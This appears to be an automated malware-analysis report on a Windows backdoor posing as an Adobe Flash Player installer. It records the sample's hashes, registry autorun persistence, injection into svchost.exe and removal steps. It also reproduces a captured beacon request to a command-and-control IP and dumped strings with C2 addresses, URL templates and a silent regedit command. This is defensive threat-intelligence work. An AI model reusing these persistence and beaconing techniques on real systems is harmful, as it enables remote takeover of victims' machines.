HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.224722 (B) (Emsisoft), Gen:Variant.Kazy.224568 (AdAware), Backdoor.Win32.Simbot.FD, BackdoorSimbot.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d53eaa886b9f6ebda6eb9ace72289765
SHA1: a0955846e2863481f95a1fd86eb4fb31e56ed746
SHA256: 080729ae424311a680b37bde0dd3981e34e4d2a7af7bbcb0a45c97cf64e1066a
SSDeep: 384:zAFSSXtX4ncfyL016cVmYkhzTyVBZM1kpjbZrym882UACdxRS2lkg:zzc4wlKyzckphrF8UASxR g
Size: 20992 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Premium Installer
Created at: 2010-11-06 05:06:34
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1144
regedit.exe:1604
The Backdoor injects its code into the following process(es):
svchost.exe:1236
File activity
The process %original file name%.exe:1144 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
C:\RCX1.tmp (23552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4$@2.dat (48 bytes)
C:\%original file name%.exe.tmp1 (373 bytes)
The Backdoor deletes the following file(s):
C:\%original file name%.exe.tmp1 (0 bytes)
Registry activity
The process %original file name%.exe:1144 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 6F 64 8B 32 EF 89 4F FC C2 2A AD 65 C7 0A 54"
The process regedit.exe:1604 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 44 61 7E 0C 3F 96 6E B4 C1 36 42 85 DC 7E AE"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Wmi" = "%Documents and Settings%\%current user%\Local Settings\Wmi.exe"
Dropped PE files
MD5 | File path |
---|---|
377886248e4c2678b7f33bf423b9aae8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Wmi.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1144
regedit.exe:1604 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
C:\RCX1.tmp (23552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4$@2.dat (48 bytes)
C:\%original file name%.exe.tmp1 (373 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Wmi" = "%Documents and Settings%\%current user%\Local Settings\Wmi.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Adobe Systems, Inc.
Product Name: Flash? Player Installer/Uninstaller
Product Version: 10,1,53,64
Legal Copyright: Copyright ? 1996-2010 Adobe, Inc.
Legal Trademarks: Adobe? Flash? Player
Original Filename: FlashUtil.exe
Internal Name: Adobe? Flash? Player Installer/Uninstaller 10.1
File Version: 10,1,53,64
File Description: Adobe? Flash? Player Installer/Uninstaller 10.1 r53
Comments:
Language: English (United States)
Company Name: Adobe Systems, Inc.Product Name: Flash? Player Installer/UninstallerProduct Version: 10,1,53,64Legal Copyright: Copyright ? 1996-2010 Adobe, Inc.Legal Trademarks: Adobe? Flash? PlayerOriginal Filename: FlashUtil.exeInternal Name: Adobe? Flash? Player Installer/Uninstaller 10.1File Version: 10,1,53,64File Description: Adobe? Flash? Player Installer/Uninstaller 10.1 r53Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 4392 | 4608 | 5.22707 | 9cc40aa30283d3abef7062dd7d0b6edb |
.rdata | 12288 | 1045 | 1536 | 2.51569 | b09e1f7c28fc22c6f6859d92fabdae15 |
.data | 16384 | 927 | 512 | 2.52675 | b6f8e6aec2eeab060a4a4bbf08b7eb30 |
.rsrc | 20480 | 12996 | 13312 | 5.4257 | 5fcf5950b62e1469f10a3916122e0e79 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 3
a74e26cae3dc4b39e6ea164f242940a5
be9988bc6789b1a398706a53184460c2
b56d8d9128be1bd449ed83b0587b8061
Network Activity
URLs
URL | IP |
---|---|
hxxp://71.41.214.210/bkgxm.php?id=015847111D309F33E9 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bkgxm.php?id=015847111D309F33E9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 71.41.214.210
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Server: thttpd/2.19-MX Mar 4 2013
Content-type: text/html
Date: Sun, 15 Jun 2014 20:40:17 GMT
Last-modified: Sun, 15 Jun 2014 20:40:17 GMT
Accept-Ranges: bytes
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN". "http://VVV.w3.org/TR/html4/loose.dtd">.<html>.<head>.<meta http-equiv='X-UA-Compatible' content='IE=EmulateIE9' />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.<meta http-equiv="Content-Script-Type" content="text/javascript">.<meta http-equiv="Content-Style-Type" content="text/css">.<meta name="publisher" content="MOBOTIX AG, Germany">.<meta name="copyright" content="MOBOTIX AG, Germany">.<link rel="SHORTCUT ICON" href="/favicon.ico">.<link rel="apple-touch-icon" href="/apple-touch-icon.png">.<meta name="author" content="Daniel Kabs, MOBOTIX AG, Germany">.<link rel="owner" href="mailto:info@mobotix.com">.<link rel="copyright" href="/about.html" title="Copyright">..<style type='text/css'>.body {. font-family:Helvetica,Arial,sans-serif;. font-size:80%;.}.pre,textarea { font-family:monospace; }..headtablesmall { font-size:125%; }..standard {} /* obsolete */..mxSubmitButton {. width: 110px;. margin:2px 0;.}..mxErrorMessage {. color:red;. background-color:yellow;. font-weight:bold;. padding:5px;.}..mxFooterWarning {. padding:5px;. margin:0;. background-color:#DDDDDD;. color:red;. font-weight:bold;.}..mxFooterNote {. padding:5px;. margin:0;. background-color:#DDDDDD;.}..mxSubmitbuttonsRow {. background-color:#DDDDDD;. border-collapse:collapse;.}..mxSubmitbuttonsRow td {. padding:5px;.}..mxReadOnly {. background:#eee
<<
<<< skipped >>>
Map
The Backdoor connects to the servers at the folowing location(s):
Strings from Dumps
svchost.exe_1236:
.text
.text
`.rdata
`.rdata
@.data
@.data
SSh@C@
SSh@C@
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ADVAPI32.dll
ADVAPI32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
71.56.69.34
71.56.69.34
71.41.214.210
71.41.214.210
yahoofacebook.345.pl
yahoofacebook.345.pl
regedit.exe /s
regedit.exe /s
~dfds3.reg
~dfds3.reg
Windows Registry Editor Version 5.00
Windows Registry Editor Version 5.00
"%s"="%s"
"%s"="%s"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinHttp
WinHttp
%s.tmp1
%s.tmp1
4$@2.dat
4$@2.dat
http://%s:%d/%s.php?id=d%s&ext=%s
http://%s:%d/%s.php?id=d%s&ext=%s
/%s.php?id=d%s&ext=%s
/%s.php?id=d%s&ext=%s
http://%s:%d/%s.php?id=d%s
http://%s:%d/%s.php?id=d%s
%c%c%c%c%c
%c%c%c%c%c
/%s.php?id=d%s
/%s.php?id=d%s
%%temp%%\%u
%%temp%%\%u
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
X-X-X-X-X-X
X-X-X-X-X-X
01-01-01-01-01-01
01-01-01-01-01-01
%c%c%c%c%c%c.exe
%c%c%c%c%c%c.exe
svchost.exe_1236_rwx_00400000_00005000:
.text
.text
`.rdata
`.rdata
@.data
@.data
SSh@C@
SSh@C@
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ADVAPI32.dll
ADVAPI32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
71.56.69.34
71.56.69.34
71.41.214.210
71.41.214.210
yahoofacebook.345.pl
yahoofacebook.345.pl
regedit.exe /s
regedit.exe /s
~dfds3.reg
~dfds3.reg
Windows Registry Editor Version 5.00
Windows Registry Editor Version 5.00
"%s"="%s"
"%s"="%s"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinHttp
WinHttp
%s.tmp1
%s.tmp1
4$@2.dat
4$@2.dat
http://%s:%d/%s.php?id=d%s&ext=%s
http://%s:%d/%s.php?id=d%s&ext=%s
/%s.php?id=d%s&ext=%s
/%s.php?id=d%s&ext=%s
http://%s:%d/%s.php?id=d%s
http://%s:%d/%s.php?id=d%s
%c%c%c%c%c
%c%c%c%c%c
/%s.php?id=d%s
/%s.php?id=d%s
%%temp%%\%u
%%temp%%\%u
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
X-X-X-X-X-X
X-X-X-X-X-X
01-01-01-01-01-01
01-01-01-01-01-01
%c%c%c%c%c%c.exe
%c%c%c%c%c%c.exe